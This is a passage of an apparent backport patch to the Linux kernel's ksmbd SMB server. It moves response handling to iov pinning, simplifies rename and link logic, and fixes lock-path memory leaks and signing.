+@@ -5309,6 +5311,14 @@ int smb2_query_info(struct ksmbd_work *work)
+ 		rc = -EOPNOTSUPP;
+ 	}
+ 
++	if (!rc) {
++		rsp->StructureSize = cpu_to_le16(9);
++		rsp->OutputBufferOffset = cpu_to_le16(72);
++		rc = ksmbd_iov_pin_rsp(work, (void *)rsp,
++				       offsetof(struct smb2_query_info_rsp, Buffer) +
++					le32_to_cpu(rsp->OutputBufferLength));
++	}
++
+ 	if (rc < 0) {
+ 		if (rc == -EACCES)
+ 			rsp->hdr.Status = STATUS_ACCESS_DENIED;
+@@ -5316,6 +5326,8 @@ int smb2_query_info(struct ksmbd_work *work)
+ 			rsp->hdr.Status = STATUS_FILE_CLOSED;
+ 		else if (rc == -EIO)
+ 			rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
++		else if (rc == -ENOMEM)
++			rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
+ 		else if (rc == -EOPNOTSUPP || rsp->hdr.Status == 0)
+ 			rsp->hdr.Status = STATUS_INVALID_INFO_CLASS;
+ 		smb2_set_err_rsp(work);
+@@ -5324,9 +5336,6 @@ int smb2_query_info(struct ksmbd_work *work)
+ 			    rc);
+ 		return rc;
+ 	}
+-	rsp->StructureSize = cpu_to_le16(9);
+-	rsp->OutputBufferOffset = cpu_to_le16(72);
+-	inc_rfc1001_len(work->response_buf, 8);
+ 	return 0;
+ }
+ 
+@@ -5357,8 +5366,9 @@ static noinline int smb2_close_pipe(struct ksmbd_work *work)
+ 	rsp->AllocationSize = 0;
+ 	rsp->EndOfFile = 0;
+ 	rsp->Attributes = 0;
+-	inc_rfc1001_len(work->response_buf, 60);
+-	return 0;
++
++	return ksmbd_iov_pin_rsp(work, (void *)rsp,
++				 sizeof(struct smb2_close_rsp));
+ }
+ 
+ /**
+@@ -5463,15 +5473,17 @@ int smb2_close(struct ksmbd_work *work)
+ 
+ 	err = ksmbd_close_fd(work, volatile_id);
+ out:
++	if (!err)
++		err = ksmbd_iov_pin_rsp(work, (void *)rsp,
++					sizeof(struct smb2_close_rsp));
++
+ 	if (err) {
+ 		if (rsp->hdr.Status == 0)
+ 			rsp->hdr.Status = STATUS_FILE_CLOSED;
+ 		smb2_set_err_rsp(work);
+-	} else {
+-		inc_rfc1001_len(work->response_buf, 60);
+ 	}
+ 
+-	return 0;
++	return err;
+ }
+ 
+ /**
+@@ -5489,50 +5501,24 @@ int smb2_echo(struct ksmbd_work *work)
+ 
+ 	rsp->StructureSize = cpu_to_le16(4);
+ 	rsp->Reserved = 0;
+-	inc_rfc1001_len(work->response_buf, 4);
+-	return 0;
++	return ksmbd_iov_pin_rsp(work, rsp, sizeof(struct smb2_echo_rsp));
+ }
+ 
+ static int smb2_rename(struct ksmbd_work *work,
+ 		       struct ksmbd_file *fp,
+-		       struct user_namespace *user_ns,
+ 		       struct smb2_file_rename_info *file_info,
+ 		       struct nls_table *local_nls)
+ {
+ 	struct ksmbd_share_config *share = fp->tcon->share_conf;
+-	char *new_name = NULL, *abs_oldname = NULL, *old_name = NULL;
+-	char *pathname = NULL;
+-	struct path path;
+-	bool file_present = true;
+-	int rc;
++	char *new_name = NULL;
++	int rc, flags = 0;
+ 
+ 	ksmbd_debug(SMB, "setting FILE_RENAME_INFO\n");
+-	pathname = kmalloc(PATH_MAX, GFP_KERNEL);
+-	if (!pathname)
+-		return -ENOMEM;
+-
+-	abs_oldname = file_path(fp->filp, pathname, PATH_MAX);
+-	if (IS_ERR(abs_oldname)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-	old_name = strrchr(abs_oldname, '/');
+-	if (old_name && old_name[1] != '\0') {
+-		old_name++;
+-	} else {
+-		ksmbd_debug(SMB, "can't get last component in path %s\n",
+-			    abs_oldname);
+-		rc = -ENOENT;
+-		goto out;
+-	}
+-
+ 	new_name = smb2_get_name(file_info->FileName,
+ 				 le32_to_cpu(file_info->FileNameLength),
+ 				 local_nls);
+-	if (IS_ERR(new_name)) {
+-		rc = PTR_ERR(new_name);
+-		goto out;
+-	}
++	if (IS_ERR(new_name))
++		return PTR_ERR(new_name);
+ 
+ 	if (strchr(new_name, ':')) {
+ 		int s_type;
+@@ -5558,10 +5544,10 @@ static int smb2_rename(struct ksmbd_work *work,
+ 		if (rc)
+ 			goto out;
+ 
+-		rc = ksmbd_vfs_setxattr(user_ns,
+-					fp->filp->f_path.dentry,
++		rc = ksmbd_vfs_setxattr(file_mnt_user_ns(fp->filp),
++					&fp->filp->f_path,
+ 					xattr_stream_name,
+-					NULL, 0, 0);
++					NULL, 0, 0, true);
+ 		if (rc < 0) {
+ 			pr_err("failed to store stream name in xattr: %d\n",
+ 			       rc);
+@@ -5573,47 +5559,18 @@ static int smb2_rename(struct ksmbd_work *work,
+ 	}
+ 
+ 	ksmbd_debug(SMB, "new name %s\n", new_name);
+-	rc = ksmbd_vfs_kern_path(work, new_name, LOOKUP_NO_SYMLINKS, &path, 1);
+-	if (rc) {
+-		if (rc != -ENOENT)
+-			goto out;
+-		file_present = false;
+-	} else {
+-		path_put(&path);
+-	}
+-
+ 	if (ksmbd_share_veto_filename(share, new_name)) {
+ 		rc = -ENOENT;
+ 		ksmbd_debug(SMB, "Can't rename vetoed file: %s\n", new_name);
+ 		goto out;
+ 	}
+ 
+-	if (file_info->ReplaceIfExists) {
+-		if (file_present) {
+-			rc = ksmbd_vfs_remove_file(work, new_name);
+-			if (rc) {
+-				if (rc != -ENOTEMPTY)
+-					rc = -EINVAL;
+-				ksmbd_debug(SMB, "cannot delete %s, rc %d\n",
+-					    new_name, rc);
+-				goto out;
+-			}
+-		}
+-	} else {
+-		if (file_present &&
+-		    strncmp(old_name, path.dentry->d_name.name, strlen(old_name))) {
+-			rc = -EEXIST;
+-			ksmbd_debug(SMB,
+-				    "cannot rename already existing file\n");
+-			goto out;
+-		}
+-	}
++	if (!file_info->ReplaceIfExists)
++		flags = RENAME_NOREPLACE;
+ 
+-	rc = ksmbd_vfs_fp_rename(work, fp, new_name);
++	rc = ksmbd_vfs_rename(work, &fp->filp->f_path, new_name, flags);
+ out:
+-	kfree(pathname);
+-	if (!IS_ERR(new_name))
+-		kfree(new_name);
++	kfree(new_name);
+ 	return rc;
+ }
+ 
+@@ -5624,8 +5581,8 @@ static int smb2_create_link(struct ksmbd_work *work,
+ 			    struct nls_table *local_nls)
+ {
+ 	char *link_name = NULL, *target_name = NULL, *pathname = NULL;
+-	struct path path;
+-	bool file_present = true;
++	struct path path, parent_path;
++	bool file_present = false;
+ 	int rc;
+ 
+ 	if (buf_len < (u64)sizeof(struct smb2_file_link_info) +
+@@ -5653,18 +5610,17 @@ static int smb2_create_link(struct ksmbd_work *work,
+ 	}
+ 
+ 	ksmbd_debug(SMB, "target name is %s\n", target_name);
+-	rc = ksmbd_vfs_kern_path(work, link_name, LOOKUP_NO_SYMLINKS, &path, 0);
++	rc = ksmbd_vfs_kern_path_locked(work, link_name, LOOKUP_NO_SYMLINKS,
++					&parent_path, &path, 0);
+ 	if (rc) {
+ 		if (rc != -ENOENT)
+ 			goto out;
+-		file_present = false;
+-	} else {
+-		path_put(&path);
+-	}
++	} else
++		file_present = true;
+ 
+ 	if (file_info->ReplaceIfExists) {
+ 		if (file_present) {
+-			rc = ksmbd_vfs_remove_file(work, link_name);
++			rc = ksmbd_vfs_remove_file(work, &path);
+ 			if (rc) {
+ 				rc = -EINVAL;
+ 				ksmbd_debug(SMB, "cannot delete %s\n",
+@@ -5684,6 +5640,9 @@ static int smb2_create_link(struct ksmbd_work *work,
+ 	if (rc)
+ 		rc = -EINVAL;
+ out:
++	if (file_present)
++		ksmbd_vfs_kern_path_unlock(&parent_path, &path);
++
+ 	if (!IS_ERR(link_name))
+ 		kfree(link_name);
+ 	kfree(pathname);
+@@ -5750,8 +5709,8 @@ static int set_file_basic_info(struct ksmbd_file *fp,
+ 		da.flags = XATTR_DOSINFO_ATTRIB | XATTR_DOSINFO_CREATE_TIME |
+ 			XATTR_DOSINFO_ITIME;
+ 
+-		rc = ksmbd_vfs_set_dos_attrib_xattr(user_ns,
+-						    filp->f_path.dentry, &da);
++		rc = ksmbd_vfs_set_dos_attrib_xattr(user_ns, &filp->f_path, &da,
++				true);
+ 		if (rc)
+ 			ksmbd_debug(SMB,
+ 				    "failed to restore file attribute in EA\n");
+@@ -5861,12 +5820,6 @@ static int set_rename_info(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 			   struct smb2_file_rename_info *rename_info,
+ 			   unsigned int buf_len)
+ {
+-	struct user_namespace *user_ns;
+-	struct ksmbd_file *parent_fp;
+-	struct dentry *parent;
+-	struct dentry *dentry = fp->filp->f_path.dentry;
+-	int ret;
+-
+ 	if (!(fp->daccess & FILE_DELETE_LE)) {
+ 		pr_err("no right to delete : 0x%x\n", fp->daccess);
+ 		return -EACCES;
+@@ -5876,32 +5829,10 @@ static int set_rename_info(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 			le32_to_cpu(rename_info->FileNameLength))
+ 		return -EINVAL;
+ 
+-	user_ns = file_mnt_user_ns(fp->filp);
+-	if (ksmbd_stream_fd(fp))
+-		goto next;
+-
+-	parent = dget_parent(dentry);
+-	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
+-	if (ret) {
+-		dput(parent);
+-		return ret;
+-	}
+-
+-	parent_fp = ksmbd_lookup_fd_inode(d_inode(parent));
+-	inode_unlock(d_inode(parent));
+-	dput(parent);
++	if (!le32_to_cpu(rename_info->FileNameLength))
++		return -EINVAL;
+ 
+-	if (parent_fp) {
+-		if (parent_fp->daccess & FILE_DELETE_LE) {
+-			pr_err("parent dir is opened with delete access\n");
+-			ksmbd_fd_put(work, parent_fp);
+-			return -ESHARE;
+-		}
+-		ksmbd_fd_put(work, parent_fp);
+-	}
+-next:
+-	return smb2_rename(work, fp, user_ns, rename_info,
+-			   work->conn->local_nls);
++	return smb2_rename(work, fp, rename_info, work->conn->local_nls);
+ }
+ 
+ static int set_file_disposition_info(struct ksmbd_file *fp,
+@@ -6091,7 +6022,7 @@ static int smb2_set_info_sec(struct ksmbd_file *fp, int addition_info,
+ 	fp->saccess |= FILE_SHARE_DELETE_LE;
+ 
+ 	return set_info_sec(fp->conn, fp->tcon, &fp->filp->f_path, pntsd,
+-			buf_len, false);
++			buf_len, false, true);
+ }
+ 
+ /**
+@@ -6161,7 +6092,10 @@ int smb2_set_info(struct ksmbd_work *work)
+ 		goto err_out;
+ 
+ 	rsp->StructureSize = cpu_to_le16(2);
+-	inc_rfc1001_len(work->response_buf, 2);
++	rc = ksmbd_iov_pin_rsp(work, (void *)rsp,
++			       sizeof(struct smb2_set_info_rsp));
++	if (rc)
++		goto err_out;
+ 	ksmbd_fd_put(work, fp);
+ 	return 0;
+ 
+@@ -6208,28 +6142,36 @@ static noinline int smb2_read_pipe(struct ksmbd_work *work)
+ 
+ 	id = req->VolatileFileId;
+ 
+-	inc_rfc1001_len(work->response_buf, 16);
+ 	rpc_resp = ksmbd_rpc_read(work->sess, id);
+ 	if (rpc_resp) {
++		void *aux_payload_buf;
++
+ 		if (rpc_resp->flags != KSMBD_RPC_OK) {
+ 			err = -EINVAL;
+ 			goto out;
+ 		}
+ 
+-		work->aux_payload_buf =
+-			kvmalloc(rpc_resp->payload_sz, GFP_KERNEL | __GFP_ZERO);
+-		if (!work->aux_payload_buf) {
++		aux_payload_buf =
++			kvmalloc(rpc_resp->payload_sz, GFP_KERNEL);
++		if (!aux_payload_buf) {
+ 			err = -ENOMEM;
+ 			goto out;
+ 		}
+ 
+-		memcpy(work->aux_payload_buf, rpc_resp->payload,
+-		       rpc_resp->payload_sz);
++		memcpy(aux_payload_buf, rpc_resp->payload, rpc_resp->payload_sz);
+ 
+ 		nbytes = rpc_resp->payload_sz;
+-		work->resp_hdr_sz = get_rfc1002_len(work->response_buf) + 4;
+-		work->aux_payload_sz = nbytes;
++		err = ksmbd_iov_pin_rsp_read(work, (void *)rsp,
++					     offsetof(struct smb2_read_rsp, Buffer),
++					     aux_payload_buf, nbytes);
++		if (err)
++			goto out;
+ 		kvfree(rpc_resp);
++	} else {
++		err = ksmbd_iov_pin_rsp(work, (void *)rsp,
++					offsetof(struct smb2_read_rsp, Buffer));
++		if (err)
++			goto out;
+ 	}
+ 
+ 	rsp->StructureSize = cpu_to_le16(17);
+@@ -6238,7 +6180,6 @@ static noinline int smb2_read_pipe(struct ksmbd_work *work)
+ 	rsp->DataLength = cpu_to_le32(nbytes);
+ 	rsp->DataRemaining = 0;
+ 	rsp->Flags = 0;
+-	inc_rfc1001_len(work->response_buf, nbytes);
+ 	return 0;
+ 
+ out:
+@@ -6312,13 +6253,8 @@ int smb2_read(struct ksmbd_work *work)
+ 	int err = 0;
+ 	bool is_rdma_channel = false;
+ 	unsigned int max_read_size = conn->vals->max_read_size;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-	if (work->next_smb2_rcv_hdr_off) {
+-		work->send_no_response = 1;
+-		err = -EOPNOTSUPP;
+-		goto out;
+-	}
++	unsigned int id = KSMBD_NO_FID, pid = KSMBD_NO_FID;
++	void *aux_payload_buf;
+ 
+ 	if (test_share_config_flag(work->tcon->share_conf,
+ 				   KSMBD_SHARE_FLAG_PIPE)) {
+@@ -6326,6 +6262,25 @@ int smb2_read(struct ksmbd_work *work)
+ 		return smb2_read_pipe(work);
+ 	}
+ 
++	if (work->next_smb2_rcv_hdr_off) {
++		req = ksmbd_req_buf_next(work);
++		rsp = ksmbd_resp_buf_next(work);
++		if (!has_file_id(req->VolatileFileId)) {
++			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
++					work->compound_fid);
++			id = work->compound_fid;
++			pid = work->compound_pfid;
++		}
++	} else {
++		req = smb2_get_msg(work->request_buf);
++		rsp = smb2_get_msg(work->response_buf);
++	}
++
++	if (!has_file_id(id)) {
++		id = req->VolatileFileId;
++		pid = req->PersistentFileId;
++	}
++
+ 	if (req->Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE ||
+ 	    req->Channel == SMB2_CHANNEL_RDMA_V1) {
+ 		is_rdma_channel = true;
+@@ -6348,7 +6303,7 @@ int smb2_read(struct ksmbd_work *work)
+ 			goto out;
+ 	}
+ 
+-	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
++	fp = ksmbd_lookup_fd_slow(work, id, pid);
+ 	if (!fp) {
+ 		err = -ENOENT;
+ 		goto out;
+@@ -6374,21 +6329,20 @@ int smb2_read(struct ksmbd_work *work)
+ 	ksmbd_debug(SMB, "filename %pD, offset %lld, len %zu\n",
+ 		    fp->filp, offset, length);
+ 
+-	work->aux_payload_buf = kvmalloc(length, GFP_KERNEL | __GFP_ZERO);
+-	if (!work->aux_payload_buf) {
++	aux_payload_buf = kvzalloc(length, GFP_KERNEL);
++	if (!aux_payload_buf) {
+ 		err = -ENOMEM;
+ 		goto out;
+ 	}
+ 
+-	nbytes = ksmbd_vfs_read(work, fp, length, &offset);
++	nbytes = ksmbd_vfs_read(work, fp, length, &offset, aux_payload_buf);
+ 	if (nbytes < 0) {
+ 		err = nbytes;
+ 		goto out;
+ 	}
+ 
+ 	if ((nbytes == 0 && length != 0) || nbytes < mincount) {
+-		kvfree(work->aux_payload_buf);
+-		work->aux_payload_buf = NULL;
++		kvfree(aux_payload_buf);
+ 		rsp->hdr.Status = STATUS_END_OF_FILE;
+ 		smb2_set_err_rsp(work);
+ 		ksmbd_fd_put(work, fp);
+@@ -6401,11 +6355,10 @@ int smb2_read(struct ksmbd_work *work)
+ 	if (is_rdma_channel == true) {
+ 		/* write data to the client using rdma channel */
+ 		remain_bytes = smb2_read_rdma_channel(work, req,
+-						      work->aux_payload_buf,
++						      aux_payload_buf,
+ 						      nbytes);
+-		kvfree(work->aux_payload_buf);
+-		work->aux_payload_buf = NULL;
+-
++		kvfree(aux_payload_buf);
++		aux_payload_buf = NULL;
+ 		nbytes = 0;
+ 		if (remain_bytes < 0) {
+ 			err = (int)remain_bytes;
+@@ -6419,10 +6372,11 @@ int smb2_read(struct ksmbd_work *work)
+ 	rsp->DataLength = cpu_to_le32(nbytes);
+ 	rsp->DataRemaining = cpu_to_le32(remain_bytes);
+ 	rsp->Flags = 0;
+-	inc_rfc1001_len(work->response_buf, 16);
+-	work->resp_hdr_sz = get_rfc1002_len(work->response_buf) + 4;
+-	work->aux_payload_sz = nbytes;
+-	inc_rfc1001_len(work->response_buf, nbytes);
++	err = ksmbd_iov_pin_rsp_read(work, (void *)rsp,
++				     offsetof(struct smb2_read_rsp, Buffer),
++				     aux_payload_buf, nbytes);
++	if (err)
++		goto out;
+ 	ksmbd_fd_put(work, fp);
+ 	return 0;
+ 
+@@ -6505,8 +6459,8 @@ static noinline int smb2_write_pipe(struct ksmbd_work *work)
+ 	rsp->DataLength = cpu_to_le32(length);
+ 	rsp->DataRemaining = 0;
+ 	rsp->Reserved2 = 0;
+-	inc_rfc1001_len(work->response_buf, 16);
+-	return 0;
++	err = ksmbd_iov_pin_rsp(work, (void *)rsp,
++				offsetof(struct smb2_write_rsp, Buffer));
+ out:
+ 	if (err) {
+ 		rsp->hdr.Status = STATUS_INVALID_HANDLE;
+@@ -6525,7 +6479,7 @@ static ssize_t smb2_write_rdma_channel(struct ksmbd_work *work,
+ 	int ret;
+ 	ssize_t nbytes;
+ 
+-	data_buf = kvmalloc(length, GFP_KERNEL | __GFP_ZERO);
++	data_buf = kvzalloc(length, GFP_KERNEL);
+ 	if (!data_buf)
+ 		return -ENOMEM;
+ 
+@@ -6662,7 +6616,9 @@ int smb2_write(struct ksmbd_work *work)
+ 	rsp->DataLength = cpu_to_le32(nbytes);
+ 	rsp->DataRemaining = 0;
+ 	rsp->Reserved2 = 0;
+-	inc_rfc1001_len(work->response_buf, 16);
++	err = ksmbd_iov_pin_rsp(work, rsp, offsetof(struct smb2_write_rsp, Buffer));
++	if (err)
++		goto out;
+ 	ksmbd_fd_put(work, fp);
+ 	return 0;
+ 
+@@ -6709,15 +6665,11 @@ int smb2_flush(struct ksmbd_work *work)
+ 
+ 	rsp->StructureSize = cpu_to_le16(4);
+ 	rsp->Reserved = 0;
+-	inc_rfc1001_len(work->response_buf, 4);
+-	return 0;
++	return ksmbd_iov_pin_rsp(work, rsp, sizeof(struct smb2_flush_rsp));
+ 
+ out:
+-	if (err) {
+-		rsp->hdr.Status = STATUS_INVALID_HANDLE;
+-		smb2_set_err_rsp(work);
+-	}
+-
++	rsp->hdr.Status = STATUS_INVALID_HANDLE;
++	smb2_set_err_rsp(work);
+ 	return err;
+ }
+ 
+@@ -6843,7 +6795,7 @@ static int smb2_set_flock_flags(struct file_lock *flock, int flags)
+ 	case SMB2_LOCKFLAG_UNLOCK:
+ 		ksmbd_debug(SMB, "received unlock request\n");
+ 		flock->fl_type = F_UNLCK;
+-		cmd = 0;
++		cmd = F_SETLK;
+ 		break;
+ 	}
+ 
+@@ -6949,6 +6901,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 		if (lock_start > U64_MAX - lock_length) {
+ 			pr_err("Invalid lock range requested\n");
+ 			rsp->hdr.Status = STATUS_INVALID_LOCK_RANGE;
++			locks_free_lock(flock);
+ 			goto out;
+ 		}
+ 
+@@ -6968,6 +6921,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 				    "the end offset(%llx) is smaller than the start offset(%llx)\n",
+ 				    flock->fl_end, flock->fl_start);
+ 			rsp->hdr.Status = STATUS_INVALID_LOCK_RANGE;
++			locks_free_lock(flock);
+ 			goto out;
+ 		}
+ 
+@@ -6979,6 +6933,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 				    flock->fl_type != F_UNLCK) {
+ 					pr_err("conflict two locks in one request\n");
+ 					err = -EINVAL;
++					locks_free_lock(flock);
+ 					goto out;
+ 				}
+ 			}
+@@ -6987,6 +6942,7 @@ int smb2_lock(struct ksmbd_work *work)
+ 		smb_lock = smb2_lock_init(flock, cmd, flags, &lock_list);
+ 		if (!smb_lock) {
+ 			err = -EINVAL;
++			locks_free_lock(flock);
+ 			goto out;
+ 		}
+ 	}
+@@ -7118,10 +7074,6 @@ skip:
+ 
+ 				ksmbd_debug(SMB,
+ 					    "would have to wait for getting lock\n");
+-				spin_lock(&work->conn->llist_lock);
+-				list_add_tail(&smb_lock->clist,
+-					      &work->conn->lock_list);
+-				spin_unlock(&work->conn->llist_lock);
+ 				list_add(&smb_lock->llist, &rollback_list);
+ 
+ 				argv = kmalloc(sizeof(void *), GFP_KERNEL);
+@@ -7147,19 +7099,12 @@ skip:
+ 
+ 				ksmbd_vfs_posix_lock_wait(flock);
+ 
+-				spin_lock(&work->conn->request_lock);
+ 				spin_lock(&fp->f_lock);
+ 				list_del(&work->fp_entry);
+-				work->cancel_fn = NULL;
+-				kfree(argv);
+ 				spin_unlock(&fp->f_lock);
+-				spin_unlock(&work->conn->request_lock);
+ 
+ 				if (work->state != KSMBD_WORK_ACTIVE) {
+ 					list_del(&smb_lock->llist);
+-					spin_lock(&work->conn->llist_lock);
+-					list_del(&smb_lock->clist);
+-					spin_unlock(&work->conn->llist_lock);
+ 					locks_free_lock(flock);
+ 
+ 					if (work->state == KSMBD_WORK_CANCELLED) {
+@@ -7171,8 +7116,7 @@ skip:
+ 						work->send_no_response = 1;
+ 						goto out;
+ 					}
+-					init_smb2_rsp_hdr(work);
+-					smb2_set_err_rsp(work);
++
+ 					rsp->hdr.Status =
+ 						STATUS_RANGE_NOT_LOCKED;
+ 					kfree(smb_lock);
+@@ -7180,19 +7124,16 @@ skip:
+ 				}
+ 
+ 				list_del(&smb_lock->llist);
+-				spin_lock(&work->conn->llist_lock);
+-				list_del(&smb_lock->clist);
+-				spin_unlock(&work->conn->llist_lock);
+-
++				release_async_work(work);
+ 				goto retry;
+ 			} else if (!rc) {
++				list_add(&smb_lock->llist, &rollback_list);
+ 				spin_lock(&work->conn->llist_lock);
+ 				list_add_tail(&smb_lock->clist,
+ 					      &work->conn->lock_list);
+ 				list_add_tail(&smb_lock->flist,
+ 					      &fp->lock_list);
+ 				spin_unlock(&work->conn->llist_lock);
+-				list_add(&smb_lock->llist, &rollback_list);
+ 				ksmbd_debug(SMB, "successful in taking lock\n");
+ 			} else {
+ 				goto out;
+@@ -7207,7 +7148,10 @@ skip:
+ 	ksmbd_debug(SMB, "successful in taking lock\n");
+ 	rsp->hdr.Status = STATUS_SUCCESS;
+ 	rsp->Reserved = 0;
+-	inc_rfc1001_len(work->response_buf, 4);
++	err = ksmbd_iov_pin_rsp(work, rsp, sizeof(struct smb2_lock_rsp));
++	if (err)
++		goto out;
++
+ 	ksmbd_fd_put(work, fp);
+ 	return 0;
+ 
+@@ -7226,7 +7170,7 @@ out:
+ 		rlock->fl_start = smb_lock->start;
+ 		rlock->fl_end = smb_lock->end;
+ 
+-		rc = vfs_lock_file(filp, 0, rlock, NULL);
++		rc = vfs_lock_file(filp, F_SETLK, rlock, NULL);
+ 		if (rc)
+ 			pr_err("rollback unlock fail : %d\n", rc);
+ 
+@@ -7648,7 +7592,8 @@ static inline int fsctl_set_sparse(struct ksmbd_work *work, u64 id,
+ 
+ 		da.attr = le32_to_cpu(fp->f_ci->m_fattr);
+ 		ret = ksmbd_vfs_set_dos_attrib_xattr(user_ns,
+-						     fp->filp->f_path.dentry, &da);
++						     &fp->filp->f_path,
++						     &da, true);
+ 		if (ret)
+ 			fp->f_ci->m_fattr = old_fattr;
+ 	}
+@@ -8003,9 +7948,9 @@ dup_ext_out:
+ 	rsp->Reserved = cpu_to_le16(0);
+ 	rsp->Flags = cpu_to_le32(0);
+ 	rsp->Reserved2 = cpu_to_le32(0);
+-	inc_rfc1001_len(work->response_buf, 48 + nbytes);
+-
+-	return 0;
++	ret = ksmbd_iov_pin_rsp(work, rsp, sizeof(struct smb2_ioctl_rsp) + nbytes);
++	if (!ret)
++		return ret;
+ 
+ out:
+ 	if (ret == -EACCES)
+@@ -8140,8 +8085,9 @@ static void smb20_oplock_break_ack(struct ksmbd_work *work)
+ 	rsp->Reserved2 = 0;
+ 	rsp->VolatileFid = volatile_id;
+ 	rsp->PersistentFid = persistent_id;
+-	inc_rfc1001_len(work->response_buf, 24);
+-	return;
++	ret = ksmbd_iov_pin_rsp(work, rsp, sizeof(struct smb2_oplock_break));
++	if (!ret)
++		return;
+ 
+ err_out:
+ 	opinfo->op_state = OPLOCK_STATE_NONE;
+@@ -8273,6 +8219,11 @@ static void smb21_lease_break_ack(struct ksmbd_work *work)
+ 			    le32_to_cpu(req->LeaseState));
+ 	}
+ 
++	if (ret < 0) {
++		rsp->hdr.Status = err;
++		goto err_out;
++	}
++
+ 	lease_state = lease->state;
+ 	opinfo->op_state = OPLOCK_STATE_NONE;
+ 	wake_up_interruptible_all(&opinfo->oplock_q);
+@@ -8280,22 +8231,17 @@ static void smb21_lease_break_ack(struct ksmbd_work *work)
+ 	wake_up_interruptible_all(&opinfo->oplock_brk);
+ 	opinfo_put(opinfo);
+ 
+-	if (ret < 0) {
+-		rsp->hdr.Status = err;
+-		goto err_out;
+-	}
+-
+ 	rsp->StructureSize = cpu_to_le16(36);
+ 	rsp->Reserved = 0;
+ 	rsp->Flags = 0;
+ 	memcpy(rsp->LeaseKey, req->LeaseKey, 16);
+ 	rsp->LeaseState = lease_state;
+ 	rsp->LeaseDuration = 0;
+-	inc_rfc1001_len(work->response_buf, 36);
+-	return;
++	ret = ksmbd_iov_pin_rsp(work, rsp, sizeof(struct smb2_lease_ack));
++	if (!ret)
++		return;
+ 
+ err_out:
+-	opinfo->op_state = OPLOCK_STATE_NONE;
+ 	wake_up_interruptible_all(&opinfo->oplock_q);
+ 	atomic_dec(&opinfo->breaking_cnt);
+ 	wake_up_interruptible_all(&opinfo->oplock_brk);
+@@ -8430,43 +8376,19 @@ int smb2_check_sign_req(struct ksmbd_work *work)
+ void smb2_set_sign_rsp(struct ksmbd_work *work)
+ {
+ 	struct smb2_hdr *hdr;
+-	struct smb2_hdr *req_hdr;
+ 	char signature[SMB2_HMACSHA256_SIZE];
+-	struct kvec iov[2];
+-	size_t len;
++	struct kvec *iov;
+ 	int n_vec = 1;
+ 
+-	hdr = smb2_get_msg(work->response_buf);
+-	if (work->next_smb2_rsp_hdr_off)
+-		hdr = ksmbd_resp_buf_next(work);
+-
+-	req_hdr = ksmbd_req_buf_next(work);
+-
+-	if (!work->next_smb2_rsp_hdr_off) {
+-		len = get_rfc1002_len(work->response_buf);
+-		if (req_hdr->NextCommand)
+-			len = ALIGN(len, 8);
+-	} else {
+-		len = get_rfc1002_len(work->response_buf) -
+-			work->next_smb2_rsp_hdr_off;
+-		len = ALIGN(len, 8);
+-	}
+-
+-	if (req_hdr->NextCommand)
+-		hdr->NextCommand = cpu_to_le32(len);
+-
++	hdr = ksmbd_resp_buf_curr(work);
+ 	hdr->Flags |= SMB2_FLAGS_SIGNED;
+ 	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
+ 
+-	iov[0].iov_base = (char *)&hdr->ProtocolId;
+-	iov[0].iov_len = len;
+-
+-	if (work->aux_payload_sz) {
+-		iov[0].iov_len -= work->aux_payload_sz;
+-
+-		iov[1].iov_base = work->aux_payload_buf;
+-		iov[1].iov_len = work->aux_payload_sz;
++	if (hdr->Command == SMB2_READ) {
++		iov = &work->iov[work->iov_idx - 1];
+ 		n_vec++;
++	} else {
++		iov = &work->iov[work->iov_idx];
+ 	}
+ 
+ 	if (!ksmbd_sign_smb2_pdu(work->conn, work->sess->sess_key, iov, n_vec,
+@@ -8542,29 +8464,14 @@ int smb3_check_sign_req(struct ksmbd_work *work)
+ void smb3_set_sign_rsp(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_hdr *req_hdr, *hdr;
++	struct smb2_hdr *hdr;
+ 	struct channel *chann;
+ 	char signature[SMB2_CMACAES_SIZE];
+-	struct kvec iov[2];
++	struct kvec *iov;
+ 	int n_vec = 1;
+-	size_t len;
+ 	char *signing_key;
+ 
+-	hdr = smb2_get_msg(work->response_buf);
+-	if (work->next_smb2_rsp_hdr_off)
+-		hdr = ksmbd_resp_buf_next(work);
+-
+-	req_hdr = ksmbd_req_buf_next(work);
+-
+-	if (!work->next_smb2_rsp_hdr_off) {
+-		len = get_rfc1002_len(work->response_buf);
+-		if (req_hdr->NextCommand)
+-			len = ALIGN(len, 8);
+-	} else {
+-		len = get_rfc1002_len(work->response_buf) -
+-			work->next_smb2_rsp_hdr_off;
+-		len = ALIGN(len, 8);
+-	}
++	hdr = ksmbd_resp_buf_curr(work);
+ 
+ 	if (conn->binding == false &&
+ 	    le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
+@@ -8580,21 +8487,18 @@ void smb3_set_sign_rsp(struct ksmbd_work *work)
+ 	if (!signing_key)
+ 		return;
+ 
+-	if (req_hdr->NextCommand)
+-		hdr->NextCommand = cpu_to_le32(len);
+-
+ 	hdr->Flags |= SMB2_FLAGS_SIGNED;
+ 	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
+-	iov[0].iov_base = (char *)&hdr->ProtocolId;
+-	iov[0].iov_len = len;
+-	if (work->aux_payload_sz) {
+-		iov[0].iov_len -= work->aux_payload_sz;
+-		iov[1].iov_base = work->aux_payload_buf;
+-		iov[1].iov_len = work->aux_payload_sz;
++
++	if (hdr->Command == SMB2_READ) {
++		iov = &work->iov[work->iov_idx - 1];
+ 		n_vec++;
++	} else {
++		iov = &work->iov[work->iov_idx];
+ 	}
+ 
+-	if (!ksmbd_sign_smb3_pdu(conn, signing_key, iov, n_vec, signature))
++	if (!ksmbd_sign_smb3_pdu(conn, signing_key, iov, n_vec,
++				 signature))
